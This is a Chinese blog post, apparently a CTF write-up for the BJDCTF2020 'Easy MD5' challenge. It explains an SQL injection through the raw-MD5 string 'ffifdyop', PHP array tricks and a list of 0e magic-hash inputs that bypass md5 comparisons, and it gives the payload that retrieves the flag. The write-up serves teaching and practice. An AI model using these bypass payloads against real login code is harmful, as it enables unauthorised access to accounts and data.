[BJDCTF2020]Easy MD5 1

于 2023-03-26 13:52:38 发布
阅读量784 收藏
点赞数
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73728268/article/details/129778410
版权

文章目录

[BJDCTF2020]Easy MD5 1

知识点一sql注入绕过md5

在这里插入图片描述

select * from ‘admin’ where password=md5($pass,true)

源码中的提示,绕过md5,ffifdyop这个进行md5加密后变成276f722736c95d99e921722cf9ed621c
这个前几位经过mysql转换成十进制后对应的ASCII码内容为刚好是’ or '正好闭合,又因为or是万能密码头,即可以绕过

知识点二md5绕比较
<!-- $a = $GET['a']; $b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

1.利用数组绕过
a[]=1&b[]=1,由于 md5 函数哈希数组会返回 NULL,故只需传入不同的数组即可

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

2.利用0e科学计数法加科学计数法即可绕过即可

QNKCDZO
0e830400451993494058024219903391
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514

payload:param1[]=0e509367213418206700842008763514&param2[]=0e848240448830537924465865611904
即可得到flag

md5绕过学习

Harder.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MD5.zip_MD5Java_easy _elephantykb
09-21
JAVAMD5加密 很好用的 AVAMD5 encryption is very easy to use
2.rar_1T16_dwt_easy _noiseb5p
07-14
matlab cod fore DWT very Easy
批量修改视频MD5
03-16
一键批量修改视频MD5,上传到网盘、视频站的时候规避审核
MD5 Checksum Tool v4.1
07-23
NoVirusThanks MD5 Checksum Tool is a free and easy to use application designed to allow users to generate the file checksum (MD5/SHA1 hash) of a file or string. It can be very useful to check if an ...
Easy Touch 5 Touchscreen Virtual Controls 5.0.12
04-14
Easy Touch 5 Touchscreen Virtual Controls 5.0.12
BUUCTF [BJDCTF2020]Easy MD5 1
m0_73995922的博客
12-05 561
尝试sql注入发现无回显只有url中传递password参数尝试burpsuite抓包提示我们sql语句,关于password=md5($pass,true) ,这里我们需要用到字符串ffifdyop,它的md5结果是:276f722736c95d99e921722cf9ed621c 。通过这个结果我们可以发现得到16字节的二进制被解析为字符的结果是:'or'6,sql语句变成select * from 'admin' where password=''or'6'。参考(1条消息) PHP中MD5常见绕过_
easy sysprep v5
最新发布
07-30
Easy Sysprep V5 是一款方便使用的系统准备工具。它可以帮助用户轻松地进行系统部署和准备工作。它支持多种操作系统版本,包括 Windows XP、Windows 7、Windows 8、Windows 10 等。 Easy Sysprep V5 具有很多实用功能。首先,它允许用户自定义系统配置。用户可以选择安装所需的软件和驱动程序,并进行个性化设置,如屏幕分辨率、网络设置等。这样,在系统部署后,用户就不需要花费时间手动安装软件和进行配置,大大提高了工作效率。 其次,Easy Sysprep V5 还支持创建系统备份和还原。用户可以使用该工具创建系统的镜像备份,以便在需要时恢复到某个特定时间点的系统状态。这对于系统出现问题或需要回退到先前状态的情况下非常有用。 此外,Easy Sysprep V5 还具有自动化部署功能。用户可以使用该工具将设置应用到多台计算机上,大大简化了大规模部署的任务。 Easy Sysprep V5 界面简洁友好,操作简单易懂,即使对计算机初学者来说也很容易上手。它提供了丰富的帮助文档和指导,用户可以通过查看文档来解决一些常见的问题。 总之,Easy Sysprep V5 是一款功能强大、易于使用的系统准备工具,无论是个人用户还是企业用户,都可以从中受益。它可以加快系统部署和配置的速度,提高工作效率,同时还具备自动化部署和系统备份还原的功能,为用户提供了更多便利。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值